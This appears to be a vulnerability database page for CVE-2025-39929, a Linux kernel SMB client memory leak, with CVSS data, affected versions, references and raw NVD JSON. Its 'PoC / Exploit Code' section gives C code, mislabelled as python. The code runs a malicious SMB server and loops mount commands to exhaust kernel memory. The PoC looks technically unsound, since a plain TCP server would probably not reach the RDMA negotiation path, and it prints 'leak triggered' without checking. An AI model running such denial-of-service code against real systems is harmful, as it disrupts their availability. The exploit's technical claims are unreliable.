CVE-2025-39929

Description

In the Linux kernel, the following vulnerability has been resolved: smb: client: fix smbdirect_recv_io leak in smbd_negotiate() error path During tests of another unrelated patch I was able to trigger this error: Objects remaining on __kmem_cache_shutdown()

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.17 (commit 0991418bf98f)

Linux Kernel stable分支（需检查各长期维护版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-39929 PoC - Trigger smbdirect_recv_io leak
// This PoC demonstrates how to trigger the memory leak by repeatedly
// attempting SMB Direct connections that fail during negotiation

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define SMB_PORT 445
#define MAX_ATTEMPTS 1000

// Create a fake SMB server that accepts connections but fails
// during SMB Direct negotiation, causing smbdirect_recv_io leak
int create_malicious_smb_server(int port) {
    int server_fd, client_fd;
    struct sockaddr_in server_addr, client_addr;
    socklen_t addr_len = sizeof(client_addr);

    server_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (server_fd < 0) return -1;

    int opt = 1;
    setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = INADDR_ANY;
    server_addr.sin_port = htons(port);

    if (bind(server_fd, (struct sockaddr*)&server_addr, sizeof(server_addr)) < 0) {
        close(server_fd);
        return -1;
    }

    listen(server_fd, 5);

    // Accept connections and send invalid SMB Direct response
    // to trigger negotiation failure and memory leak
    while (1) {
        client_fd = accept(server_fd, (struct sockaddr*)&client_addr, &addr_len);
        if (client_fd < 0) continue;

        // Send malformed SMB Direct negotiation response
        // This causes the client to fail negotiation and leak smbdirect_recv_io
        char invalid_response[] = {0x00, 0x00, 0x00, 0xFF};  // Invalid SMB header
        write(client_fd, invalid_response, sizeof(invalid_response));

        // Close connection abruptly
        close(client_fd);
    }

    return 0;
}

// Client side: trigger the vulnerability by mounting SMB share
// from the malicious server repeatedly
int trigger_leak() {
    for (int i = 0; i < MAX_ATTEMPTS; i++) {
        // Use mount command or libsmbclient to connect to malicious server
        // Each failed negotiation leaks smbdirect_recv_io objects
        char cmd[256];
        snprintf(cmd, sizeof(cmd),
                 "mount -t cifs //127.0.0.1/share /mnt/test -o vers=3.1.1,rdma 2>/dev/null");
        system(cmd);
        system("umount /mnt/test 2>/dev/null");

        if (i % 100 == 0) {
            printf("Attempt %d: Memory leak triggered\n", i);
        }
    }
    return 0;
}

int main() {
    printf("CVE-2025-39929 PoC - SMB Direct recv_io memory leak\n");

    // Fork to run malicious server in background
    if (fork() == 0) {
        create_malicious_smb_server(SMB_PORT);
        exit(0);
    }

    sleep(1);
    trigger_leak();

    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-39929
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-39929
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-39929/
[4] VulDB https://vuldb.com/cve/CVE-2025-39929
[5] https://git.kernel.org/stable/c/0991418bf98f191d0c320bd25245fcffa1998c7e
[6] https://git.kernel.org/stable/c/3d7c075c878ac844e33c43e506c2fa27ac7e9689
[7] https://git.kernel.org/stable/c/922338efaad63cfe30d459dfc59f9d69ff93ded4
[8] https://git.kernel.org/stable/c/daac51c7032036a0ca5f1aa419ad1b0471d1c6e0
[9] https://git.kernel.org/stable/c/e7b7a93879558e77d950f1ff9a6f3daa385b33df
[10] https://cert-portal.siemens.com/productcert/html/ssa-082556.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-39929", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T08:15:44.620", "lastModified": "2026-05-12T13:17:17.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix smbdirect_recv_io leak in smbd_negotiate() error path\n\nDuring tests of another unrelated patch I was able to trigger this\nerror: Objects remaining on __kmem_cache_shutdown()"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.16", "versionEndExcluding": "6.1.154", "matchCriteriaId": "0F31848E-0ABB-4DCA-8DBD-F87E2F0E43DE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.108", "matchCriteriaId": "A7E8EAEE-7731-4996-9578-696255D61EA2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.49", "matchCriteriaId": "CAA033E9-A2C5-4976-A83E-9804D8FB827F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.16.9", "matchCriteriaId": "638DD910-1189-4F5E-98BF-2D436B695112"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "47E4C5C0-079F-4838-971B-8C503D48FCC2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "5A4516A6-C12E-42A4-8C0E-68AEF3264504"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0991418bf98f191d0c320bd25245fcffa1998c7e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3d7c075c878ac844e33c43e506c2fa27ac7e9689", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/922338efaad63cfe30d459dfc59f9d69ff93ded4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/daac51c7032036a0ca5f1aa419ad1b0471d1c6e0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e7b7a93879558e77d950f1ff9a6f3daa385b33df", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}